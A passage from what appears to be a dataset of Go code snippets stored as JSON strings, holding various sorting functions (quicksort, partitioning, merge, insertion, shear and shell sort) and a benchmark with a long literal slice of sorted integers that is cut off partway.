QSort(arr []int) {\n\tsort(arr, 0, len(arr)-1)\n}", "func PartitionGT(slice interface{}, i int, cmp func(j, k int) int) (pos int) {\n\tv := reflect.ValueOf(slice)\n\tswp := reflect.Swapper(slice)\n\n\tsize := v.Len()\n\tfor j := 0; j < size; j++ {\n\t\tif cmp(j, i) > 0 {\n\t\t\tpos++\n\t\t}\n\t}\n\n\tif i != pos {\n\t\tswp(i, pos)\n\t}\n\n\tri := pos + 1\n\tif ri == size {\n\t\treturn\n\t}\n\tfor li := 0; li < pos; li++ {\n\t\tif cmp(li, pos) < 0 {\n\t\t\tfor {\n\t\t\t\tif cmp(ri, pos) > 0 {\n\t\t\t\t\tswp(li, ri)\n\t\t\t\t\tri++\n\t\t\t\t\tbreak\n\t\t\t\t} else {\n\t\t\t\t\tri++\n\t\t\t\t}\n\t\t\t}\n\t\t\tif ri == size {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\n\t}\n\n\treturn\n}", "func PartitionLT(slice interface{}, i int, cmp func(j, k int) int) (pos int) {\n\tv := reflect.ValueOf(slice)\n\tswp := reflect.Swapper(slice)\n\n\tsize := v.Len()\n\tfor j := 0; j < size; j++ {\n\t\tif cmp(j, i) < 0 {\n\t\t\tpos++\n\t\t}\n\t}\n\n\tif i != pos {\n\t\tswp(i, pos)\n\t}\n\n\tri := pos + 1\n\tif ri == size {\n\t\treturn\n\t}\n\tfor li := 0; li < pos; li++ {\n\t\tif cmp(li, pos) > 0 {\n\t\t\tfor {\n\t\t\t\tif cmp(ri, pos) < 0 {\n\t\t\t\t\tswp(li, ri)\n\t\t\t\t\tri++\n\t\t\t\t\tbreak\n\t\t\t\t} else {\n\t\t\t\t\tri++\n\t\t\t\t}\n\t\t\t}\n\t\t\tif ri == size {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\n\t}\n\n\treturn\n}", "func (lst *List) Partition(k int) {\n\tif lst != nil {\n\t\tpivot := lst.Start\n\t\tvar p2 *Node\n\n\t\t//Find the partition element in the Link list\n\t\tfor pivot.data != k {\n\t\t\tpivot = pivot.next\n\t\t}\n\n\t\t//Once the partition element is found set a pointer to the next node of the partition and a pointer to the start of the List\n\t\tp2 = pivot.next\n\t\tp1 := lst.Start\n\n\t\t//Isolate pivot by disconnect the nodes before Pivot and after pivot\n\n\t\tpivotNode := &Node{\n\t\t\tdata: pivot.data,\n\t\t\tnext: nil,\n\t\t}\n\n\t\ts := pivotNode\n\t\tend := pivotNode\n\n fmt.Printf(\"Pivot is: %d \\n\" ,pivot.data)\n\n\t\tfor p1 != pivot {\n tmp := p1\n p1 = p1.next\n fmt.Printf(\"Processing: %+v \\n\",tmp)\n if tmp.data < pivot.data{\n tmp.next = s\n s = tmp\n }else{\n end.next = tmp\n end = tmp\n \n end.next = nil\n }\n \n\t\t}\n \n for p2 != nil{\n tmp := p2\n p2 = p2.next\n if tmp.data < pivot.data{\n tmp.next = s\n s = tmp\n }else{\n end.next = tmp\n end = tmp\n end.next = nil\n }\n \n }\n\n t := s\n for (t != nil){\n fmt.Print(\"-->\", t.data)\n t = t.next\n }\n\t}\n}", "func QuickSort(data interface{}, cmp func(i, j interface{}) bool) []interface{} {\n\tvalue := reflect.ValueOf(data)\n\tdataS := make([]interface{}, value.Len())\n\tfor a := 0; a < value.Len(); a++ {\n\t\tdataS[a] = value.Index(a).Interface()\n\t}\n\tqsHandle(dataS, 0, len(dataS)-1, cmp)\n\treturn dataS\n}", "func clusterSort(slice []*cluster) []*cluster {\n\t//Base case\n\tif len(slice) == 1 {\n\t\treturn slice\n\t}\n\tvar sorted []*cluster = make([]*cluster, len(slice))\n\tvar sortedPtr int = 0\n\t//Otherwise, we have some sorting to do\n\t//so sort each half\n\tleft := clusterSort(slice[:len(slice)/2])\n\tright := clusterSort(slice[len(slice)/2:])\n\tleftPtr, rightPtr := 0, 0\n\t//and then combine them\n\tfor i := 0; i < len(left)+len(right); i++ {\n\t\tif left[leftPtr].Members > right[rightPtr].Members {\n\t\t\t//left is smaller, place it in the sorted\n\t\t\tsorted[sortedPtr] = left[leftPtr]\n\t\t\tsortedPtr++\n\t\t\tleftPtr++\n\t\t} else {\n\t\t\t//right is smaller, place it in the sorted\n\t\t\tsorted[sortedPtr] = right[rightPtr]\n\t\t\tsortedPtr++\n\t\t\trightPtr++\n\t\t}\n\t\tif leftPtr == len(left) {\n\t\t\tfor _, element := range right[rightPtr:] {\n\t\t\t\tsorted[sortedPtr] = element\n\t\t\t\tsortedPtr++\n\t\t\t}\n\t\t\tbreak\n\t\t} else if rightPtr == len(right) {\n\t\t\tfor _, element := range left[leftPtr:] {\n\t\t\t\tsorted[sortedPtr] = element\n\t\t\t\tsortedPtr++\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\t}\n\treturn sorted\n}", "func shearSort(proc meshinfo) {\n defer proc.signal.Done()\n\tvalue := <-proc.input\n\n t := 0\n for phase := proc.rows; phase > 1; phase /= 2 {\n snake(&value,t,proc)\n up(&value,t+1,proc)\n t += 2\n }\n snake(&value,t,proc)\n\n}", "func merge(datas interfaces.Sortable, lo, mid, hi int) {\n\ti, j := lo, mid+1\n\t// In order to use sort.Interface\n\t// We can only use swap to reorder datas instead of copying data directly\n\t// so we recorded datas' index and calculate the swap pairs, then swap them\n\ttargetIdx := make([]int, hi-lo+1)\n\tfor k := lo; k <= hi; k++ {\n\t\tif i > mid {\n\t\t\ttargetIdx[k-lo] = j - lo\n\t\t\tj++\n\t\t} else if j > hi {\n\t\t\ttargetIdx[k-lo] = i - lo\n\t\t\ti++\n\t\t} else if datas.Less(i, j) {\n\t\t\ttargetIdx[k-lo] = i - lo\n\t\t\ti++\n\t\t} else {\n\t\t\ttargetIdx[k-lo] = j - lo\n\t\t\tj++\n\t\t}\n\t}\n\t// swap all pairs\n\tfor from, to := range findSwapPairs(targetIdx) {\n\t\tif from == to {\n\t\t\tcontinue\n\t\t}\n\t\tdatas.Swap(from+lo, to+lo)\n\t}\n}", "func insert_sort(a [8]int) [8]int {\r\n\tfor i := 1; i < len(a); i++ {\r\n\t\tfor j := i; j > 0; j-- {\r\n\t\t\tif a[j] < a[j-1] {\r\n\t\t\t\ta[j], a[j-1] = a[j-1], a[j]\r\n\t\t\t} else {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn a\r\n}", "func sortSlice(unorderedSlice[]int){\r\n\r\n\tdefer wg.Done()\r\n\ti := 0\r\n\t\r\n\tfor i < totalNumbers{\r\n\t\tindexOne := 0\r\n\t\tindexTwo := 1\r\n\t\t\r\n\t\tfor(indexTwo < totalNumbers){\r\n\t\t\r\n\t\t\tvarOne := unorderedSlice[indexOne]\r\n\t\t\tvarTwo := unorderedSlice[indexTwo]\r\n\t\t\t\r\n\t\t\tif(varTwo < varOne){\r\n\t\t\t\tunorderedSlice[indexOne] = varTwo\r\n\t\t\t\tunorderedSlice[indexTwo] = varOne\r\n\t\t\t}\t\t\t\r\n\t\t\tindexOne++\r\n\t\t\tindexTwo++\r\n\t\t}\r\n\t\ti++\r\n\t}\r\n}", "func ShellSort(c ds.Comparables, interval int) ds.Comparables {\n\tif len(c) <= 1 {\n\t\treturn c\n\t}\n\n\tif interval == 1 {\n\t\treturn InsertionSort(c)\n\t}\n\n\tsub := make([][]int, 0)\n\n\tfor i := 0; i <= int(math.Ceil(float64(len(c)/2))); i++ {\n\t\tif i+interval < len(c) {\n\t\t\tsub = append(sub, []int{i, i + interval})\n\t\t} else {\n\t\t\tsub = append(sub, []int{i})\n\t\t}\n\t}\n\n\tfor _, s := range sub {\n\t\tif len(s) == 1 {\n\t\t\tcontinue\n\t\t}\n\n\t\tif c[s[1]].Compare(c[s[0]]) < 0 {\n\t\t\tc[s[1]], c[s[0]] = c[s[0]], c[s[1]]\n\t\t}\n\t}\n\n\treturn ShellSort(c, int(math.Ceil(float64(interval/2))))\n}", "func BenchmarkQuickSortSortedInt(b *testing.B) {\n\tconst dataSize int = 5000\n\n\tdata := []int{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 490, 491, 492, 493, 494, 495, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 522, 523, 524, 525, 526, 527, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 538, 539, 540, 541, 542, 543, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 554, 555, 556, 557, 558, 559, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 570, 571, 572, 573, 574, 575, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 586, 587, 588, 589, 590, 591, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 650, 651, 652, 653, 654, 655, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 666, 667, 668, 669, 670, 671, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 682, 683, 684, 685, 686, 687, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 698, 699, 700, 701, 702, 703, 704, 705, 706, 707, 708, 709, 710, 711, 712, 713, 714, 715, 716, 717, 718, 719, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 730, 731, 732, 733, 734, 735, 736, 737, 738, 739, 740, 741, 742, 743, 744, 745, 746, 747, 748, 749, 750, 751, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 762, 763, 764, 765, 766, 767, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 778, 779, 780, 781, 782, 783, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 794, 795, 796, 797, 798, 799, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 810, 811, 812, 813, 814, 815, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 826, 827, 828, 829, 830, 831, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 842, 843, 844, 845, 846, 847, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 858, 859, 860, 861, 862, 863, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 874, 875, 876, 877, 878, 879, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 890, 891, 892, 893, 894, 895, 896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 911, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, 930, 931, 932, 933, 934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, 972, 973, 974, 975, 976, 977, 978, 979, 980, 981, 982, 983, 984, 985, 986, 987, 988, 989, 990, 991, 992, 993, 994, 995, 996, 997, 998, 999, 1000, 1001, 1002, 1003, 1004, 1005, 1006, 1007, 1008, 1009, 1010, 1011, 1012, 1013, 1014, 1015, 1016, 1017, 1018, 1019, 1020, 1021, 1022, 1023, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1032, 1033, 1034, 1035, 1036, 1037, 1038, 1039, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 1103, 1104, 1105, 1106, 1107, 1108, 1109, 1110, 1111, 1112, 1113, 1114, 1115, 1116, 1117, 1118, 1119, 1120, 1121, 1122, 1123, 1124, 1125, 1126, 1127, 1128, 1129, 1130, 1131, 1132, 1133, 1134, 1135, 1136, 1137, 1138, 1139, 1140, 1141, 1142, 1143, 1144, 1145, 1146, 1147, 1148, 1149, 1150, 1151, 1152, 1153, 1154, 1155, 1156, 1157, 1158, 1159, 1160, 1161, 1162, 1163, 1164, 1165, 1166, 1167, 1168, 1169, 1170, 1171, 1172, 1173, 1174, 1175, 1176, 1177, 1178, 1179, 1180, 1181, 1182, 1183, 1184, 1185, 1186, 1187, 1188, 1189, 1190, 1191, 1192, 1193, 1194, 1195, 1196, 1197, 1198, 1199, 1200, 1201, 1202, 1203, 1204, 1205, 1206, 1207, 1208, 1209, 1210, 1211, 1212, 1213, 1214, 1215, 1216, 1217, 1218, 1219, 1220, 1221, 1222, 1223, 1224, 1225, 1226, 1227, 1228, 1229, 1230, 1231, 1232, 1233, 1234, 1235, 1236, 1237, 1238, 1239, 1240, 1241, 1242, 1243, 1244, 1245, 1246, 1247, 1248, 1249, 1250, 1251, 1252, 1253, 1254, 1255, 1256, 1257, 1258, 1259, 1260, 1261, 1262, 1263, 1264, 1265, 1266, 1267, 1268, 1269, 1270, 1271, 1272, 1273, 1274, 1275, 1276, 1277, 1278, 1279, 1280, 1281, 1282, 1283, 1284, 1285, 1286, 1287, 1288, 1289, 1290, 1291, 1292, 1293, 1294, 1295, 1296, 1297, 1298, 1299, 1300, 1301, 1302, 1303, 1304, 1305, 1306, 1307, 1308, 1309, 1310, 1311, 1312, 1313, 1314, 1315, 1316, 1317, 1318, 1319, 1320, 1321, 1322, 1323, 1324, 1325, 1326, 1327, 1328, 1329, 1330, 1331, 1332, 1333, 1334, 1335, 1336, 1337, 1338, 1339, 1340, 1341, 1342, 1343, 1344, 1345, 1346, 1347, 1348, 1349, 1350, 1351, 1352, 1353, 1354, 1355, 1356, 1357, 1358, 1359, 1360, 1361, 1362, 1363, 1364, 1365, 1366, 1367, 1368, 1369, 1370, 1371, 1372, 1373, 1374, 1375, 1376, 1377, 1378, 1379, 1380, 1381, 1382, 1383, 1384, 1385, 1386, 1387, 1388, 1389, 1390, 1391, 1392, 1393, 1394, 1395, 1396, 1397, 1398, 1399, 1400, 1401, 1402, 1403, 1404, 1405, 1406, 1407, 1408, 1409, 1410, 1411, 1412, 1413, 1414, 1415, 1416, 1417, 1418, 1419, 1420, 1421, 1422, 1423, 1424, 1425, 1426, 1427, 1428, 1429, 1430, 1431, 1432, 1433, 1434, 1435, 1436, 1437, 1438, 1439, 1440, 1441, 1442, 1443, 1444, 1445, 1446, 1447, 1448, 1449, 1450, 1451, 1452, 1453, 1454, 1455, 1456, 1457, 1458, 1459, 1460, 1461, 1462, 1463, 1464, 1465, 1466, 1467, 1468, 1469, 1470, 1471, 1472, 1473, 1474, 1475, 1476, 1477, 1478, 1479, 1480, 1481, 1482, 1483, 1484, 1485, 1486, 1487, 1488, 1489, 1490, 1491, 1492, 1493, 1494, 1495, 1496, 1497, 1498, 1499, 1500, 1501, 1502, 1503, 1504, 1505, 1506, 1507, 1508, 1509, 1510, 1511, 1512, 1513, 1514, 1515, 1516, 1517, 1518, 1519, 1520, 1521, 1522, 1523, 1524, 1525, 1526, 1527, 1528, 1529, 1530, 1531, 1532, 1533, 1534, 1535, 1536, 1537, 1538, 1539, 1540, 1541, 1542, 1543, 1544, 1545, 1546, 1547, 1548, 1549, 1550, 1551, 1552, 1553, 1554, 1555, 1556, 1557, 1558, 1559, 1560, 1561, 1562, 1563, 1564, 1565, 1566, 1567, 1568, 1569, 1570, 1571, 1572, 1573, 1574, 1575, 1576, 1577, 1578, 1579, 1580, 1581, 1582, 1583, 1584, 1585, 1586, 1587, 1588, 1589, 1590, 1591, 1592, 1593, 1594, 1595, 1596, 1597, 1598, 1599, 1600, 1601, 1602, 1603, 1604, 1605, 1606, 1607, 1608, 1609, 1610, 1611, 1612, 1613, 1614, 1615, 1616, 1617, 1618, 1619, 1620, 1621, 1622, 1623, 1624, 1625, 1626, 1627, 1628, 1629, 1630, 1631, 1632, 1633, 1634, 1635, 1636, 1637, 1638, 1639, 1640, 1641, 1642, 1643, 1644, 1645, 1646, 1647, 1648, 1649, 1650, 1651, 1652, 1653, 1654, 1655, 1656, 1657, 1658, 1659, 1660, 1661, 1662, 1663, 1664, 1665, 1666, 1667, 1668, 1669, 1670, 1671, 1672, 1673, 1674, 1675, 1676, 1677, 1678, 1679, 1680, 1681, 1682, 1683, 1684, 1685, 1686, 1687, 1688, 1689, 1690, 1691, 1692, 1693, 1694, 1695, 1696, 1697, 1698, 1699, 1700, 1701, 1702, 1703, 1704, 1705, 1706, 1707, 1708, 1709, 1710, 1711, 1712, 1713, 1714, 1715, 1716, 1717, 1718, 1719, 1720, 1721, 1722, 1723, 1724, 1725, 1726, 1727, 1728, 1729, 1730, 1731, 1732, 1733, 1734, 1735, 1736, 1737, 1738, 1739, 1740, 1741, 1742, 1743, 1744, 1745, 1746, 1747, 1748, 1749, 1750, 1751, 1752, 1753, 1754, 1755, 1756, 1757, 1758, 1759, 1760, 1761, 1762, 1763, 1764, 1765, 1766, 1767, 1768, 1769, 1770, 1771, 1772, 1773, 1774, 1775, 1776, 1777, 1778, 1779, 1780, 1781, 1782, 1783, 1784, 1785, 1786, 1787, 1788, 1789, 1790, 1791, 1792, 1793, 1794, 1795, 1796, 1797, 1798, 1799, 1800, 1801, 1802, 1803, 1804, 1805, 1806, 1807, 1808, 1809, 1810, 1811, 1812, 1813, 1814, 1815, 1816, 1817, 1818, 1819, 1820, 1821, 1822, 1823, 1824, 1825, 1826, 1827, 1828, 1829, 1830, 1831, 1832, 1833, 1834, 1835, 1836, 1837, 1838, 1839, 1840, 1841, 1842, 1843, 1844, 1845, 1846, 1847, 1848, 1849, 1850, 1851, 1852, 1853, 1854, 1855, 1856, 1857, 1858, 1859, 1860, 1861, 1862, 1863, 1864, 1865, 1866, 1867, 1868, 1869, 1870, 1871, 1872, 1873, 1874, 1875, 1876, 1877, 1878, 1879, 1880, 1881, 1882, 1883, 1884, 1885, 1886, 1887, 1888, 1889, 1890, 1891, 1892, 1893, 1894, 1895, 1896, 1897, 1898, 1899, 1900, 1901, 1902, 1903, 1904, 1905, 1906, 1907, 1908, 1909, 1910, 1911, 1912, 1913, 1914, 1915, 1916, 1917, 1918, 1919, 1920, 1921, 1922, 1923, 1924, 1925, 1926, 1927, 1928, 1929, 1930, 1931, 1932, 1933, 1934, 1935, 1936, 1937, 1938, 1939, 1940, 1941, 1942, 1943, 1944, 1945, 1946, 1947, 1948, 1949, 1950, 1951, 1952, 1953, 1954, 1955, 1956, 1957, 1958, 1959, 1960, 1961, 1962, 1963, 1964, 1965, 1966, 1967, 1968, 1969, 1970, 1971, 1972, 1973, 1974, 1975, 1976, 1977, 1978, 1979, 1980, 1981, 1982, 1983, 1984, 1985, 1986, 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021, 2022, 2023, 2024, 2025, 2026, 2027, 2028, 2029, 2030, 2031, 2032, 2033, 2034, 2035, 2036, 2037, 2038, 2039, 2040, 2041, 2042, 2043, 2044, 2045, 2046, 2047, 2048, 2049, 2050, 2051, 2052, 2053, 2054, 2055, 2056, 2057, 2058, 2059, 2060, 2061, 2062, 2063, 2064, 2065, 2066, 2067, 2068, 2069, 2070, 2071, 2072, 2073, 2074, 2075, 2076, 2077, 2078, 2079, 2080, 2081, 2082, 2083, 2084, 2085, 2086, 2087, 2088, 2089, 2090, 2091, 2092, 2093, 2094, 2095, 2096, 2097, 2098, 2099, 2100, 2101, 2102, 2103, 2104, 2105, 2106, 2107, 2108, 2109, 2110, 2111, 2112, 2113, 2114, 2115, 2116, 2117, 2118, 2119, 2120, 2121, 2122, 2123, 2124, 2125, 2126, 2127, 2128, 2129, 2130, 2131, 2132, 2133, 2134, 2135, 2136, 2137, 2138, 2139, 2140, 2141, 2142, 2143, 2144, 2145, 2146, 2147, 2148, 2149, 2150, 2151, 2152, 2153, 2154, 2155, 2156, 2157, 2158, 2159, 2160, 2161, 2162, 2163, 2164, 2165, 2166, 2167, 2168, 2169, 2170, 2171, 2172, 2173, 2174, 2175, 2176, 2177, 2178, 2179, 2180, 2181, 2182, 2183, 2184, 2185, 2186, 2187, 2188, 2189, 2190, 2191, 2192, 2193, 2194, 2195, 2196, 2197, 2198, 2199, 2200, 2201, 2202, 2203, 2204, 2205, 2206, 2207, 2208, 2209, 2210, 2211, 2212, 2213, 2214, 2215, 2216, 2217, 2218, 2219, 2220, 2221, 2222, 2223, 2224, 2225, 2226, 2227, 2228, 2229, 2230, 2231, 2232, 2233, 2234, 2235, 2236, 2237, 2238, 2239, 2240, 2241, 2242, 2243, 2244, 2245, 2246, 2247, 2248, 2249, 2250, 2251, 2252, 2253, 2254, 2255, 2256, 2257, 2258, 2259, 2260, 2261, 2262, 2263, 2264, 2265, 2266, 2267, 2268, 2269, 2270, 2271, 2272, 2273, 2274, 2275, 2276, 2277, 2278, 2279, 2280, 2281, 2282, 2283, 2284, 2285, 2286, 2287, 2288, 2289, 2290, 2291, 2292, 2293, 2294, 2295, 2296, 2297, 2298, 2299, 2300, 2301, 2302, 2303, 2304, 2305, 2306, 2307, 2308, 2309, 2310, 2311, 2312, 2313, 2314, 2315, 2316, 2317, 2318, 2319, 2320, 2321, 2322, 2323, 2324, 2325, 2326, 2327, 2328, 2329, 2330, 2331, 2332, 2333, 2334, 2335, 2336, 2337, 2338, 2339, 2340, 2341, 2342, 2343, 2344, 2345, 2346, 2347, 2348, 2349, 2350, 2351, 2352, 2353, 2354, 2355, 2356, 2357, 2358, 2359, 2360, 2361, 2362, 2363, 2364, 2365, 2366, 2367, 2368, 2369, 2370, 2371, 2372, 2373, 2374, 2375, 2376, 2377, 2378, 2379, 2380, 2381, 2382, 2383, 2384, 2385, 2386, 2387, 2388, 2389, 2390, 2391, 2392, 2393, 2394, 2395, 2396, 2397, 2398, 2399, 2400, 2401, 2402, 2403, 2404, 2405, 2406, 2407, 2408, 2409, 2410, 2411, 2412, 2413, 2414, 2415, 2416, 2417, 2418, 2419, 2420, 2421, 2422, 2423, 2424, 2425, 2426, 2427, 2428, 2429, 2430, 2431, 2432, 2433, 2434, 2435, 2436, 2437, 2438, 2439, 2440, 2441, 2442, 2443, 2444, 2445, 2446, 2447, 2448, 2449, 2450, 2451, 2452, 2453, 2454, 2455, 2456, 2457, 2458, 2459, 2460, 2461, 2462, 2463, 2464, 2465, 2466, 2467, 2468, 2469, 2470, 2471, 2472, 2473, 2474, 2475, 2476, 2477, 2478, 2479, 2480, 2481, 2482, 2483, 2484, 2485, 2486, 2487, 2488, 2489, 2490, 2491, 2492, 2493, 2494, 2495, 2496, 2497, 2498, 2499, 2500, 2501, 2502, 2503, 2504, 2505, 2506, 2507, 2508, 2509, 2510, 2511, 2512, 2513, 2514, 2515, 2516, 2517, 2518, 2519, 2520, 2521, 2522, 2523, 2524, 2525, 2526, 2527, 2528, 2529, 2530, 2531, 2532, 2533, 2534, 2535, 2536, 2537, 2538, 2539, 2540, 2541, 2542, 2543, 2544, 2545, 2546, 2547, 2548, 2549, 2550, 2551, 2552, 2553, 2554, 2555, 2556, 2557, 2558, 2559, 2560, 2561, 2562, 2563, 2564, 2565, 2566, 2567, 2568, 2569, 2570, 2571, 2572, 2573, 2574, 2575, 2576, 2577, 2578, 2579, 2580, 2581, 2582, 2583, 2584, 2585, 2586, 2587, 2588, 2589, 2590, 2591, 2592, 2593, 2594, 2595, 2596, 2597, 2598, 2599, 2600, 2601, 2602, 2603, 2604, 2605, 2606, 2607, 2608, 2609, 2610, 2611, 2612, 2613, 2614, 2615, 2616, 2617, 2618, 2619, 2620, 2621, 2622, 2623, 2624, 2625, 2626, 2627, 2628, 2629, 2630, 2631, 2632, 2633, 2634, 2635, 2636, 2637, 2638, 2639, 2640, 2641, 2642, 2643, 2644, 2645, 2646, 2647, 2648, 2649, 2650, 2651, 2652, 2653, 2654, 2655, 2656, 2657, 2658, 2659, 2660, 2661, 2662, 2663, 2664, 2665, 2666, 2667, 2668, 2669, 2670, 2671, 2672, 2673, 2674, 2675, 2676, 2677, 2678, 2679, 2680, 2681, 2682, 2683, 2684, 2685, 2686, 2687, 2688, 2689, 2690, 2691, 2692, 2693, 2694, 2695, 2696, 2697, 2698, 2699, 2700, 2701, 2702, 2703, 2704, 2705, 2706, 2707, 2708, 2709, 2710, 2711, 2712, 2713, 2714, 2715, 2716, 2717, 2718, 2719, 2720, 2721, 2722, 2723, 2724, 2725, 2726, 2727, 2728, 2729, 2730, 2731, 2732, 2733, 2734, 2735, 2736, 2737, 2738, 2739, 2740, 2741, 2742, 2743, 2744, 2745, 2746, 2747, 2748, 2749, 2750, 2751, 2752, 2753, 2754, 2755, 2756, 2757, 2758, 2759, 2760, 2761, 2762, 2763, 2764, 2765, 2766, 2767, 2768, 2769, 2770, 2771, 2772, 2773, 2774, 2775, 2776, 2777, 2778, 2779, 2780, 2781, 2782, 2783, 2784, 2785, 2786, 2787, 2788, 2789, 2790, 2791, 2792, 2793, 2794, 2795, 2796, 2797, 2798, 2799, 2800, 2801, 2802, 2803, 2804, 2805, 2806, 2807, 2808, 2809, 2810, 2811, 2812, 2813, 2814, 2815, 2816, 2817, 2818, 2819, 2820, 2821, 2822, 2823, 2824, 2825, 2826, 2827, 2828, 2829, 2830, 2831, 2832, 2833, 2834, 2835, 2836, 2837, 2838, 2839, 2840, 2841, 2842, 2843, 2844, 2845, 2846, 2847, 2848, 2849, 2850, 2851, 2852, 2853, 2854, 2855, 2856, 2857, 2858, 2859, 2860, 2861, 2862, 2863, 2864, 2865, 2866, 2867, 2868, 2869, 2870, 2871, 2872, 2873, 2874, 2875, 2876, 2877, 2878, 2879, 2880, 2881, 2882, 2883, 2884, 2885, 2886, 2887, 2888, 2889, 2890, 2891, 2892, 2893, 2894, 2895, 2896, 2897, 2898, 2899, 2900, 2901, 2902, 2903, 2904, 2905, 2906, 2907, 2908, 2909, 2910, 2911, 2912, 2913, 2914, 2915, 2916, 2917, 2918, 2919, 2920, 2921, 2922, 2923, 2924, 2925, 2926, 2927, 2928, 2929, 2930, 2931, 2932, 2933, 2934, 2935, 2936, 2937, 2938, 2939, 2940, 2941, 2942, 2943, 2944, 2945, 2946, 2947, 2948, 2949, 2950, 2951, 2952, 2953, 2954, 2955, 2956, 2957, 2958, 2959, 2960, 2961, 2962, 2963, 2964, 2965, 2966, 2967, 2968, 2969, 2970, 2971, 2972, 2973, 2974, 2975, 2976, 2977, 2978, 2979, 2980, 2981, 2982, 2983, 2984, 2985, 2986, 2987, 2988, 2989, 